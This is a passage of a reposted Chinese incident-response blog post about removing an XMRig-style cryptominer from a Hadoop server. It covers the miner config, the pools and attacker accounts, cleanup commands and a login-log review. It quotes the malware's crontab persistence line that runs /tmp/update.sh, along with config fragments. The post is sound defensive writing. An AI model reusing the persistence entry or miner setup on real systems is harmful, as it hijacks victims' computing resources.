                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 31,
                "asm": true
        }
    ],
    "user-agent": null,
    "watch": false
}

从上面文件看到,有两个矿池(配置项的格式看起来是 XMRig 一类矿机的 config.json):
xmr.f2pool.com:13531
xmr.pool.minergate.com:45700
pools 里的 user 字段(83p6VPXu…、jbk665q8hws5vxv)是攻击者在矿池的收款账号,可以作为 IOC 上报给矿池;threads 里配了 32 个线程、max-cpu-usage 为 90,这就是 CPU 被占满的直接原因。

随后,我先删除 hadoop 用户 crontab 里面的以下调度(crontab -e -u hadoop 删掉这一行;确认没有其它任务时也可以 crontab -r -u hadoop):

# The entry that re-launched the dropper every 10 minutes as the hadoop user.
*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1

再 kill 掉 devtool/systemctI 进程并删除相关文件(先保留一份样本;如果文件被加了 i 属性,需要先 chattr -i):

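# Keep a copy of the samples (with hashes) before anything is deleted: the
# dropper verifies its files by size and re-downloads them, so the originals
# are easy to lose and hard to get back once the C2 goes away.
mkdir -p /root/ir-samples
cp -p /tmp/update.sh /tmp/systemctI /tmp/devtool /tmp/config.json /root/ir-samples/ 2>/dev/null
sha256sum /root/ir-samples/* 2>/dev/null
# Stop the payloads.  They are started as "./devtool" / "./systemctI" from
# /tmp, so match on the exact process name, not on a path.
pkill -9 -x devtool
pkill -9 -x systemctI
# update.sh tries to set the immutable bit on its files (only succeeds when it
# ran as root); clear it first so the rm below cannot silently fail.
chattr -i /tmp/update.sh /tmp/systemctI /tmp/devtool /tmp/config.json 2>/dev/null
rm -f /tmp/update.sh /tmp/systemctI /tmp/devtool /tmp/devtools /tmp/config.json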

systemctI和devtool进程没有再启动。不过这只说明 crontab 这一条持久化被清掉了:脚本带有反弹 shell,攻击者曾经可以交互式地登录这台机器,所以还要检查脚本在 root 权限下会写入的 /etc/devtool、/etc/systemctI、/etc/config.json、/etc/update.sh、/etc/devtools,root 的 ~/.ssh/authorized_keys 有没有多出公钥,/usr/bin/wget、/usr/bin/curl 是否被改名成了 get/url,以及其它用户的 crontab。

思考:
中招的服务器限制了只能通过内网的一台跳板机访问,跳板机开放了外网,有限制只能在办公环境的外网IP访问。

查看登录日志/var/log/wtmp:

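# Login history.  update.sh truncates /var/log/wtmp and /var/log/secure on
# every run (the truncation only succeeds when it runs as root), so do not
# stop at "last": also check the rotated copies and sshd's own log before
# concluding that nobody else logged in.
last -f /var/log/wtmp
ls -l /var/log/wtmp* /var/log/secure*
grep -h 'Accepted' /var/log/secure*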

所有的登录都来自跳板机。但要注意,update.sh 每次运行都会尝试清空 /var/log/wtmp 和 /var/log/secure(需要 root 权限),如果它曾经以 root 跑过,last 看到的只是最近一次清空之后的记录,不能据此断定没有其它来源的登录。

木马程序是从哪里植入的?原因还要继续深挖。从已有线索看,它是以 hadoop 用户、通过 crontab 启动的,而不是通过 SSH 登录后植入的,所以入口更可能是某个以 hadoop 身份运行、且能从网络访问的服务(例如 Hadoop 组件的管理/REST 接口是否未鉴权、是否只对跳板机开放);这需要结合服务日志和端口暴露情况核实。


转载自blog.csdn.net/andyguan01_2/article/details/88192492